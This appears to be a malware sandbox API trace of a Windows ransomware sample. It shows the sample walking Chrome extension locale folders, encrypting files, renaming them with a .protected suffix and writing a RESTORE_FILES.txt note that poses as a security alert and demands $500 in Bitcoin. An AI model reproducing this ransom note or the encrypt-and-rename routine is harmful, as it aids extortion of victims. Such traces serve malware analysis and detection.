(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.457] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.457] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.457] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.457] CloseHandle (hObject=0x164) returned 1 [0081.457] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.457] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0081.458] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0081.458] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0081.458] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0081.458] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0081.458] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it") returned 141 [0081.458] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0081.458] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0081.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\*") returned 143 [0081.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.458] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.458] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.458] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.458] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.458] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\.") returned 143 [0081.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.458] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.458] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.458] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.458] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.458] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\..") returned 144 [0081.458] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.458] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.458] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.458] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0081.458] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.459] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.459] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.459] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.459] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json") returned 155 [0081.459] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.459] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.459] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json") returned 155 [0081.460] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json") returned 155 [0081.460] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json") returned 155 [0081.460] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.460] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.460] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.461] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.461] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.461] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.461] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.461] CloseHandle (hObject=0x168) returned 1 [0081.461] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.protected") returned 165 [0081.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.protected")) returned 1 [0081.462] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.462] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.462] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\RESTORE_FILES.txt") returned 159 [0081.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.462] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.462] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.463] lstrlenA (lpString="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") returned 684 [0081.463] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.463] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.463] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.463] CloseHandle (hObject=0x164) returned 1 [0081.463] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.463] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0081.463] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0081.463] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0081.463] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0081.463] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0081.463] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja") returned 141 [0081.463] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0081.463] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0081.463] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\*") returned 143 [0081.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.464] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.464] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.464] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.464] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.464] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.464] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\.") returned 143 [0081.464] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.464] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.464] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.464] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.464] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.464] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.464] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.464] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\..") returned 144 [0081.464] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.464] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.464] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.464] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0081.464] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.464] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.464] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.464] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.464] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json") returned 155 [0081.464] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.464] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.464] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.464] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.465] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json") returned 155 [0081.465] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.465] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json") returned 155 [0081.465] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.465] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json") returned 155 [0081.465] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.465] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10f, lpOverlapped=0x0) returned 1 [0081.466] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.466] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10f, lpOverlapped=0x0) returned 1 [0081.466] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.466] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.466] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.466] CloseHandle (hObject=0x168) returned 1 [0081.466] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.protected") returned 165 [0081.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.protected")) returned 1 [0081.467] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.467] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.467] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\RESTORE_FILES.txt") returned 159 [0081.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0081.467] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.467] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.468] lstrlenA (lpString="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") returned 684 [0081.468] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.468] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.468] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.468] CloseHandle (hObject=0x164) returned 1 [0081.468] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.468] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0081.468] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0081.468] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0081.468] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0081.468] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0081.468] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko") returned 141 [0081.468] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0081.468] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0081.468] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 